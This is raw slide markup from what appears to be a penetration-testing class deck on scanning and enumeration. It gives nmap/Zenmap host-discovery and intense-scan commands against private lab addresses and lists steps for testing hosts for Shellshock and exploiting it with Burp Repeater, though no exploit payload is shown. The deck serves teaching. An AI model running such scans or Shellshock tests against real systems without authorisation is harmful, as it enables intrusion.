            <a:ext cx="8595300" cy="3005700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="457200" lIns="2560300" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Scanning and Enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this exercise, you will perform host discovery and service enumeration on a target subnet. Then, you will scan live hosts for vulnerability to Shellshock and research Heartbleed.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t>Instructions sent via Slack.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2286" name="Google Shape;2286;p130"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2287" name="Google Shape;2287;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88" name="Google Shape;2288;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Google Slides Template</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2289" name="Google Shape;2289;p130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6840300" y="3510063"/>
            <a:ext cx="2028900" cy="2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3" name="Shape 2293"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2294" name="Google Shape;2294;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295" name="Google Shape;2295;p1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6" name="Google Shape;2296;p131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2536250" y="3682625"/>
            <a:ext cx="42204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Scanning and Enumeration</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Google Shape;2048;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49" name="Google Shape;2049;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today’s class, we’ll cover:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2050" name="Google Shape;2050;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51" name="Google Shape;2051;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2" name="Google Shape;2052;p105"/>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Nmap Warm-Up</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Google Shape;2053;p10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Understanding CVE-2014-6271: The Shellshock Vulnerability </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2054" name="Google Shape;2054;p105"/>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Scanning and Enumerating a Target Network</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2055" name="Google Shape;2055;p105"/>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Identifying Servers Vulnerable to Shellshock</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2056" name="Google Shape;2056;p10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Exploiting Shellshock with Burp Repeater</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0" name="Shape 2300"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2301" name="Google Shape;2301;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Scanning and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2302" name="Google Shape;2302;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Zenmap to perform host discovery on the range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.090-10.0.0110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2303" name="Google Shape;2303;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4" name="Google Shape;2304;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05" name="Google Shape;2305;p132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187" y="19678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Zenmap to perform an intense scan on any host you discover. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2306" name="Google Shape;2306;p132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-188" y="35357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Test both machines for vulnerability to Shellshock.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0" name="Shape 2310"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2311" name="Google Shape;2311;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Scanning and Enumeration Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2312" name="Google Shape;2312;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Zenmap to perform host discovery on the range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.090-10.0.0110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2313" name="Google Shape;2313;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14" name="Google Shape;2314;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5" name="Google Shape;2315;p133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1187213"/>
            <a:ext cx="9144000" cy="7806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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -sP 10.0.090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. You’ll identify the hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2316" name="Google Shape;2316;p133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187" y="19678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Zenmap to perform an intense scan on any host you discover. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2317" name="Google Shape;2317;p133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-188" y="35357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Test both machines for vulnerability to Shellshock.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1" name="Shape 2321"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2322" name="Google Shape;2322;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Scanning and Enumeration Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2323" name="Google Shape;2323;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Zenmap to perform host discovery on the range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.090-10.0.0110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2324" name="Google Shape;2324;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5" name="Google Shape;2325;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6" name="Google Shape;2326;p134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1187213"/>
            <a:ext cx="9144000" cy="7806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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -sP 10.0.090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. You’ll identify the hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2327" name="Google Shape;2327;p134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187" y="19678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Zenmap to perform an intense scan on any host you discover. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2328" name="Google Shape;2328;p134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-212" y="2495063"/>
            <a:ext cx="9144000" cy="780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solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -T4 -A -v 10.0.0.100-101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>You'll find an Apache server on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>and interesting information about the SSL certificate backing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101:443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2329" name="Google Shape;2329;p134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-188" y="35357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Test both machines for vulnerability to Shellshock.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3" name="Shape 2333"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2334" name="Google Shape;2334;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Scanning and Enumeration Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2335" name="Google Shape;2335;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Zenmap to perform host discovery on the range </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.090-10.0.0110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2336" name="Google Shape;2336;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7" name="Google Shape;2337;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8" name="Google Shape;2338;p135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1187213"/>
            <a:ext cx="9144000" cy="7806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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -sP 10.0.090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. You’ll identify the hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2339" name="Google Shape;2339;p135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="187" y="19678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Zenmap to perform an intense scan on any host you discover. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2340" name="Google Shape;2340;p135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-212" y="2495063"/>
            <a:ext cx="9144000" cy="780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solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap -T4 -A -v 10.0.0.100-101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>You'll find an Apache server on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.100:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>and interesting information about the SSL certificate backing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
